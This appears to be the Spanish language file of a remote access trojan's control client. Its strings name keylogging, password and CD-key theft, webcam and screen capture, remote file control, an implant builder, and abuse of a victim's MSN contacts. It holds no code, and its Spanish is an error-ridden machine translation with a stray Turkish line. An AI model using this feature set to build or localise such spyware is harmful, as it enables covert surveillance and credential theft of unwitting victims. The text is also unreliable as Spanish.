0 = comunicación 
1 = contraseñas 
2 = administrar archivos 
3 = teclado 
4 = configuración de MSN 
5 = Administrador de configuración 
6 = sistema de información 
7 = diversión administrador 
8 = captura 
9 = Propiedades del servidor 
10 = en contacto con nosotros 
11 = chat con la víctima 
12 = enviar mensaje 
13 = servidor de contraseñas 
14 = gestor de archivos 
15 = buscar archivos 
16 = teclado virtual 
17 = línea keylogger 
18 = fuera de línea keylogger 
19 = opciones Messenger 
20 = lista de contactos de MSN 
21 = mensaje instantáneo 
22 = infinito jurar 
23 = configuración del ratón 
24 = aplicaciones 
25 = los valores de la aplicación 
26 = opciones de configuración en Explorer 
27 = resoulation ajustes 
28 = obtener Información del sistema 
29 = instalado aplicación 
30 = servicios 
31 = diversión menú 
32 = captura de pantalla 
33 = webcam captura 
34 = configuración del servidor 
35 = sitio web 
36 = aproximadamente 
37 = codificado por la OMS! | Who@tikkysoft.com 
38 = Listo ... 
39 = Estado: 
40 = Offline Keylogger 
41 = las aplicaciones en ejecución 
42 = Enviar Fake Mensaje de error 
43 = uso carácter '|' para enviar el mensaje multilínea 
44 = Título del mensaje: 
45 = Icono del mensaje: 
46 = Mensaje: 
47 = Mensaje Configuración 
48 = Mensaje Botones 
49 = Sistema de Información 
50 = Chat Con las víctimas 
51 = mensajes de error 
52 = Instalado lista de aplicaciones 
53 = Servicios 
54 = línea Keylogger 
55 = Web Cam Capture 
56 = Diversión Menú 
57 = valores de la aplicación 
58 = Configuración del servidor 
59 = Obtener el Servidor de contraseñas 
60 = Configuración de Internet Explorer 
61 = Dirección: 
62 = Nombre: 
63 = Plazo: 
64 = seg. para la conexión 
65 = clave: 
66 = Valor: 
66 = Msg Título: 
67 = Mensaje: 
68 = Icono del mensaje: 
69 = Conexión: 
70 = Server Editor 
71 = Captura de webcam: 
72 = Transferencia: 
73 = captura de pantalla: 
74 = Enviar mensaje instantáneo 
75 = Messenger Dirección: 
76 = de mensajería instantánea: 
77 = Get Friendly Nombre 
78 = Cambio de Nombre de amistad 
79 = Configuración de MSN Messenger 
80 = MSN Messenger Lista de contactos 
81 = Cambio de estado 
82 = elegir la persona que va a ser objeto de abuso 
83 = Programa codificado por la OMS! 
84 = lista de malas palabras se utilizarán 
85 = Configuración de MSN Messenger 
86 = www.tikkysoft.com 
87 = activa / deactive estado 
88 = obtener las aplicaciones instaladas lista 
89 = guardar lista 
90 = claro lista 
91 = Server Editor 
92 = empezar a chatear con la víctima 
93 = dejar de chatear con la víctima 
94 = claro de chat de texto 
95 = enviar mensaje 
96 = mensaje de prueba 
97 = enviar mensaje 
98 = claro área de texto 
99 = Las contraseñas de mensajería instantánea 
100 = Red Contraseñas 
101 = contraseñas protegidas de almacenamiento 
102 = Correo Contraseñas 
103 = Escritorio remoto Contraseñas 
104 = Cd Keyler 
105 = Obtener información del sistema 
106 = Obtener información del sistema 
107 = Guardar Información del Sistema 
108 = Borrar Sistema de Información 
109 = automático 
110 = Manual 
111 = abierto en línea keylogger 
112 = estrecha línea keylogger 
113 = guardar logs 
114 = claro registros 
115 = obtener los registros fuera de línea keylogger 
116 = guardar logs 
117 = claro registros 
118 = Actualizar la lista 
119 = Borrar lista de aplicaciones 
120 = Servicio de inicio 
121 = Detener Servicio 
122 = Detener Servicio 
123 = reincorporarse al servicio 
124 = deactive 
125 = close 
126 = Módulo de Proceso 
127 = Establecer prioridad Normal 
128 = Establecer prioridad Listo 
129 = Conjunto Alta Prioridad 
130 = Ajuste de prioridad en tiempo real 
131 = Actualizar la lista 
132 = Mostrar todas las solicitudes 
133 = Maximizar aplicación seleccionada 
134 = Minimizar aplicación seleccionada 
135 = Hacer visible aplicación seleccionada 
136 = Make aplicación seleccionada Invisible 
137 = Cerrar programa seleccionado 
138 = Cambio aplicación seleccionada Título 
139 = Internet Explorer Contraseñas 
140 = Dial-Up Contraseñas 
141 = empezar a distancia webcam captura 
142 = parada remota webcam captura 
143 = ocultar escritorio 
144 = mostrar escritorio 
145 = bloqueo de escritorio 
146 = desbloquear escritorio 
147 = ocultar barra de tareas 
148 = mostrar barra de tareas 
149 = bloqueo de barra de tareas 
150 = desbloquear barra de tareas 
151 = ocultar botón de inicio 
152 = mostrar botón de inicio 
153 = bloqueo botón de inicio 
154 = desbloquear botón de inicio 
155 = ocultar ratón 
156 = mostrar ratón 
157 = bloqueo del ratón 
158 = desbloquear ratón 
159 = tarea ocultar iconos 
160 = mostrar iconos tarea 
161 = Ocultar reloj del sistema 
162 = Mostrar el reloj del sistema 
163 = Abrir CD-Rom 
164 = Cerrar CD-Rom 
165 = Cerrar Monitor 
166 = Abrir Monitor 
167 = apagado 
168 = reiniciar 
169 = logoff 
170 = hibernate 
171 = flip pantalla horizontalmente 
172 = flip pantalla verticalmente 
173 = Cambio botones de ratón 
174 = Conjunto de botones de ratón por defecto 
175 = Opem-Num Lock 
176 = Cerrar Num Lock - 
177 = Abrir Caps-Lock 
178 = Cerrar Caps-Lock 
179 = Open-Scroll Lock 
180 = Cerrar Scroll Lock - 
181 = Iniciar Infinity Enviar Mensajes 
182 = Detener Infinity Mensaje 
183 = obtener la configuración del servidor 
184 = guardar la configuración del servidor 
185 = estrecha servidor 
186 = Desinstalar el servidor 
187 = seleccione el icono 
188 = icono Hunter 
189 = mensaje de prueba 
190 = crear servidor 
191 = Open Web Page 
192 = Get Internet Explorer la página de inicio 
193 = Conjunto de Internet Explorer la página de inicio 
194 = obtener lista de contactos de msn 
195 = Guardar lista de contactos de msn 
196 = clara lista de contactos de msn 
197 = obtener contactos en línea 
198 = enviar mensajes instantáneos 
199 = obtener nombre amigable 
200 = set nombre amigable 
201 = en línea 
202 = ocupado 
203 = fuera 
204 = hablando en el teléfono 
205 = Se vuelvo 
206 = almorzando 
207 = mostrarme fuera de línea 
208 = closevictim período de sesiones 
209 = ¡Contactos en línea 
210 = enviar malas palabras 
211 = carga jurar lista 
212 = comprobar todos 
213 = desmarcar todos 
214 = juramento lista clara 
215 = Desktop 
216 = de tareas 
217 = Botón Start 
218 = Mouse 
219 = Tarea Iconos 
220 = Reloj 
221 = CD-Rom 
222 = Monitor 
223 = Informática 
224 = Flip Screen 
225 = botones de ratón 
226 = Num 
227 = Gorras 
228 = Scroll 
229 = Enviar Mensaje Infinity 
230 = Icono de Configuración 
231 = Fake Mensaje de error 
232 = IP / DNS 
233 = en Configuración de puerto 
234 = retardo de conexión 
235 = Nombre de la víctima 
236 = Ruta de instalación 
237 = Registro de Configuración 
238 = modo de servidor 
239 = Open Web Page Remotelly 
240 = aprender Internet Explorer la página de inicio 
241 = cambio de Internet Explorer la página de inicio 
242 = Nombre de la víctima 
243 = Dirección IP 
244 = Nombre de Usuario 
245 = Nombre de computadora 
246 = Admin 
247 = Sistema Operativo 
248 = CPU 
249 = Ram 
250 = País 
251 = Propiedades 
252 = Valor 
253 = Descripción
254 = información 
255 = Nombre 
256 = Version 
257 = Editor 
258 = Ruta 
259 = Nombre 
260 = Nombre Mostrado 
261 = Status 
262 = Arranque 
263 = Módulo 
264 = Nombre 
265 = PID 
266 = Ruta 
267 = Uso de la memoria 
268 = Prioridad 
269 = Nombre 
270 = Handle 
271 = Colocación 
272 = PID 
273 = Clase
274 = Connection 
275 = Port
276 = Dirección Msn 
277 = Nombre de amistad 
278 = Contactos en línea 
279 = Connection 
280 = Transferencia 
281 = Pantalla 
282 = WebCam 
283 = Cuando
284 = De 
285 = Tamaño 
286 = Status 
287 = U / D 
288 = arriba 
289 = mostrar escritorio 
290 = mostrar documentos 
291 = mostrar Windows 
292 = mostrar sistema 
293 = mostrar archivos de programa 
294 = mostrar el arranque 
295 = leer archivo de texto 
296 = Aprender conductores 
297 = conjunto walpaper 
298 = mostrar área de texto 
299 = crear una nueva carpeta 
300 = eliminar el archivo 
301 = borrar carpeta 
302 = descargar 
303 = subir 
304 = cambiar el nombre de 
305 = marcha 
306 = ocultar área de texto 
307 = refresg 
308 = guardar texto 
309 = texto claro 
310 = conductores 
311 = archivo 
312 = tipo 
313 = tamaño 
314 = atributos 
315 = File Manager 
316 = Salir 
317 = Mostrar 
318 = captura de pantalla 
319 = Iniciar captura 
320 = Detener captura 
321 = Iniciar el Control del ratón 
322 = Control Stop Mouse 
323 = Pantalla completa 
324 = Minimizar 
326 = cliente activo 
327 = cliente Deactive 
328 = lista de aplicaciones instaladas que reciben ... 
329 = lista de aplicaciones instaladas ahorro ... 
330 = lista de aplicaciones instaladas guardado. 
331 = lista de aplicaciones instaladas no se ha guardado. 
332 = instalado lista de aplicaciones de limpieza ... 
333 = lista de aplicaciones instaladas limpiarse. 
334 = apertura de chat ... 
335 = cierre de chat ... 
336 = limpiar la pantalla de chat. 
337 = pantalla de chat ha sido limpiado. 
338 = enviar mensajes instantáneos .... 
339 = falso mensaje de error probando ... 
340 = falso mensaje de error ha sido probado. 
341 = enviar falso mensaje de error ... 
342 = limpieza área de texto ... 
343 = área de texto de limpiar. 
344 = Recepción de contraseñas de mensajería instantánea .. 
345 = red receptora contraseñas .. 
346 = recibir protegidas staroage contraseñas ... 
347 = recibir correo contraseñas ... 
348 = recibir el escritorio remoto contraseñas .. 
349 = cd recibir las llaves ... 
350 = recibir navegador contraseñas ... 
351 = recibir dial-up contraseñas ... 
352 = lista de servicios que reciben ... 
353 = recibir información del sistema ... 
354 = ahorro sistema de información ... 
355 = sistema de información se ha guardado. 
356 = sistema de información no se ha guardado. 
357 = sistema de limpieza información ... 
358 = sistema de información ha sido limpiado. 
359 = automáticamente el establecimiento de servicios 
360 = fijación de los servicios manualmente 
361 = oppenig línea keylogger ... 
362 = cierre en línea keylogger ... 
363 = ahorro en línea los registros de keylogger ... 
364 = keylogger registros en línea se ha guardado. 
365 = keylogger registros en línea no se ha guardado. 
366 = limpieza de los registros en línea keylogger ... 
367 = registros en línea keylogger ha sido limpiado. 
368 = receivng keylogger registros fuera de línea ... 
369 = ahorro de los registros fuera de línea keylogger 
370 = offline keylogger registros se ha guardado 
371 = keylogger registros fuera de línea no se ha guardado. 
372 = limpieza de los registros fuera de línea keylogger ... 
373 = offline keylogger registros se ha limpiado. 
374 = aplicación receptora lista. 
375 = limpieza lista de aplicaciones ... 
376 = lista de aplicaciones de limpiar. 
377 = Por favor seleccione un tema! 
378 = A partir de servicio ... 
379 = Dejar de servicio ... 
380 = Pausa de servicio ... 
381 = La reanudación de servicio ... 
382 = cierre de aplicación ... 
383 = mostrando el módulo ... 
384 = módulo camino 
385 = tamaño 
386 = imagen de base 
387 = El establecimiento de conexión webcam ... 
388 = detener WebCam captura ... 
389 = Ocultar escritorio ... 
390 = Listado de escritorio ... 
391 = Bloqueo de escritorio ... 
392 = desbloqueo de escritorio .... 
393 = Ocultación de tareas ... 
394 = Listado de tareas ... 
395 = Bloqueo de tareas ... 
396 = desbloqueo de tareas ... 
397 = Ocultar botón de inicio ... 
398 = Listado botón de inicio ... 
399 = Bloqueo de botón de inicio ... 
400 = desbloqueo botón de inicio ... 
401 = escondiendo el cursor del ratón ... 
402 = mostrar el cursor del ratón ... 
403 = bloqueo el cursor del ratón ... 
404 = desbloquear el cursor del ratón ... 
405 = Ocultar iconos tarea ... 
406 = Listado tarea iconos ... 
407 = Ocultar el reloj del sistema ... 
408 = Listado sistema de reloj ... 
409 = Oppenning CD-Rom ... 
410 = Clausura CD-Rom ... 
411 = monitor de clausura ... 
412 = Oppenning monitor ... 
413 = El abandono de las computadoras .. 
414 = Reiniciando ... 
415 = El registro de Windows fuera ... 
416 = hibernado fuera de las ventanas ... 
417 = Flipping pantalla vertical ... 
418 = Flipping pantalla horizontalmente ... 
419 = Cambio de botones de ratón ... 
420 = Configuración de botones de ratón por defecto ... 
421 = Bloqueo Num Lock .. 
422 = Liberar Num Lock .. 
423 = Bloqueo CapsLock ... 
424 = desbloqueo CapsLock ... 
425 = Bloqueo scrolllock ... 
426 = desbloqueo scrolllock ... 
427 = infinito Envío de mensajes ... 
428 = infinito detener los mensajes ... 
429 = información del servidor de recepción ... 
430 = ahorro de una nueva configuración ... 
431 = servidor de clausura ... 
432 = desinstalar servidor ... 
433 = añadir icono ... 
434 = icono ha sido añadido. 
435 = icono no se ha añadido. 
436 = Configuración del servidor y guardado creado! 
437 = ahorro de configuración del servidor y la creación de servidor ... 
438 = este icono no son válidos. 
439 = icono ha sido seleccionado. 
440 = recibir lista de contactos de msn ... 
441 = msn lista de contactos se ha guardado. 
442 = msn lista de contactos no se ha guardado. 
443 = ir a buscar contactos en línea de víctimas lista de contactos 
444 = enviar mensaje instantáneo a la persona que ha seleccionado 
445 = obtener víctima nombre amigable 
446 = cambiar víctima nombre amigable 
447 = cambiar el estatuto de víctima a 'en línea' 
448 = cambiar el estatuto de víctima a 'ocupado' 
449 = cambiar el estatuto de víctima para "afuera" 
450 = cambiar el estatuto de víctima a 'hablando en el teléfono " 
451 = cambiar el estatuto de víctima a 'será vuelvo " 
452 = cambiar el estatuto de víctima a 'tener el almuerzo " 
453 = cambiar el estatuto de víctima a "show me fuera de línea ' 
454 = cierre víctima msn código de acceso ... 
455 = abusar de la persona que ha seleccionado de la lista de víctimas 
456 = la instalación de jurar lista ... 
457 = jurar lista instalado 
458 = jurar lista no se instala 
459 = lista de todos los temas ha sido comprobada. 
460 = lista de todos los temas ha sido sin marcar. 
461 = jurar lista de limpiar. 
462 = oppened pantalla de chat. 
463 = pantalla de chat cerrado. 
464 = sistema de información recibida. 
465 = lista de aplicaciones reveiced 
466 = instalado lista de aplicaciones recibidas. 
467 = conductores han recibido. 
468 = carpeta se ha suprimido. 
469 = carpeta no ha sido eliminado. 
470 = accoured un error. 
471 = sistema de información recibida. 
472 = ofline keylogger registros recibidos. 
473 = víctima se encuentra en línea. 
474 = atajos recibido. 
475 = servidor de contraseñas se han recibido. 
476 = web cam no se encuentra. 
477 = web cam conductores han recibido. 
478 = sitio web conectado. 
479 = Internet Explorer, la página de inicio se han recibido. 
480 = Internet Explorer, la página de inicio ha cambiado. 
481 = recibir los registros en línea keylogger ... 
482 = archivo de texto ha sido readed. 
483 = msn lista de contactos recibidos. 
484 = msn lista de contactos online se han recibido. 
485 = msn nombre amigable recibido. 
486 = filesize recibido. 
487 = keylogger en línea cerrada 
488 = keylogger comenzó en línea 
489 = eliminado. 
490 = archivo ha sido correr. 
491 = archivo ha sido renemaed. 
492 = archivo has't sido renemaed. 
493 = uygulama calistirilamadi 
494 = archivo no se borra. 
495 = papel tapiz cambiado. 
496 = fondo de pantalla no se modificará. 
497 = víctima cambió su estatus a "en línea" 
498 = víctima cambió su estatus a 'ocupado' 
499 = víctima cambió su condición de «fuera» 
500 = víctima cambió su estatus a "hablar por teléfono ' 
501 = víctima cambió su estatus a "estará de regreso pronto" 
502 = víctima cambió su estatus a "almorzando" 
503 = víctima cambió su estatus a "show me fuera de línea ' 
504 = víctima del período de sesiones cerrado con éxito 
505 = 505 = víctima de amistad nombre se ha cambiado 
506 = éxito abusado de la persona que ha seleccionado de la lista de víctimas 
507 = mensajería instantánea ha sido enviar. 
508 = Desktop está oculto 
509 = Desktop es visible 
510 = Desktop bloqueado 
511 = Desktop desbloqueado 
512 = barra de tareas está oculto 
513 = barra de tareas es visible 
514 = barra de tareas está bloqueada 
515 = barra de tareas está desbloqueado 
516 = botón de inicio está oculto 
517 = botón de inicio es visible 
518 = botón de inicio está bloqueado 
519 = botón de inicio está desbloqueado 
520 = oculta el cursor del ratón 
521 = visible el cursor del ratón 
522 = el cursor del ratón bloqueado 
523 = desbloqueado el cursor del ratón 
524 = tarea iconos están ocultos 
525 = tarea iconos son visibles 
526 = reloj oculto 
527 = reloj visible 
528 = CD ROM abierto 
529 = CD ROM cerrado 
530 = monitor cerrado 
531 = monitor abierto 
532 = Computer shutdowned. 
533 = reiniciar la computadora. 
534 = Windows sesión de usuario expira 
535 = Windows hibernado. 
536 = Pantalla vuelta verticalmente 
537 = vuelta pantalla horizontalmente 
538 = botones del ratón ha cambiado 
539 = conjunto botones del ratón por defecto 
540 = numlock abierto 
541 = numlock cerrado 
542 = CapsLock abierto 
543 = CapsLock cerrado 
544 = scrolllock abierto 
545 = scrolllock cerrado 
546 = infinito enviar mensaje se ha iniciado. 
547 = infinito enviar mensaje ha sido detenido. 
548 = falso mensaje de error ha sido enviar. 
549 = carpeta se ha creado. 
550 = distancia constitutivo de la captura de pantalla ... 
551 = Conexión a Escritorio remoto se detuvo 
552 = Ingresar Nombre de carpeta: 
553 = Nueva carpeta 
554 = Nueva carpeta 
555 = Icono se ha guardado. 
556 = Icono no se guarda. 
557 = Introduzca un nuevo nombre: 
558 = nuevo nombre 
559 = no conenction! 
560 = espera ... 
561 = descarga ... 
562 = archivo se ha descargado. 
563 = subir ... 
564 = archivo se ha subido. 
565 = conectado. 
566 = expedientes recibidos. 
567 = Actualizar lista de aplicaciones ... 
568 = Aplicación maximizada 
569 = Application minimizar 
570 = Application mostró 
571 = Aplicación está oculto 
572 = Application ventana cerrada 
573 = Application Leyenda cambiado. 
574 = todas las solicitudes recibidas. 
575 = lista de servicios recibidos. 
576 = módulo de proceso se han recibido. 
577 = lista de aplicaciones recibidas. 
578 = login MSN Messenger cerrado. 
579 = Por favor seleccione un amigo 
580 = expedientes recibidos. 
581 = cámara dejó de streaming 
582 = cámara no se encuentra. 
583 = Por favor seleccione una aplicación 
584 = Tamaño de archivo 0 KB. 
585 = leer palabra archivo 
586 = comenzar la transferencia 
587 = dejar de transferencia 
588 = quitar lista 
589 = lista clara 
590 = servidor cerrado 
591 = Servidor de configuración guardado 
592 = Plugin ejecutados. 
593 = Plugin archivo se ha añadido a la lista de carga 
594 = Por favor seleccione un contacto 
595 = local herramientas 
596 = éxito 
597 = éxito 
598 = Imprimir 
599 = Imprimir un Texto 
600 = Texto ajustes 
601 = texto impreso 
602 = Tamaño 
603 = Bold 
604 = Subrayado 
605 = Cursiva 
606 = Strikethru 

607 = Borrar Texto 
608 = Imprimir Texto 
609 = Impresión de texto ... 
610 = texto ha sido impreso. 
611 = texto no ha sido impresa. 
612 = Borrar Texto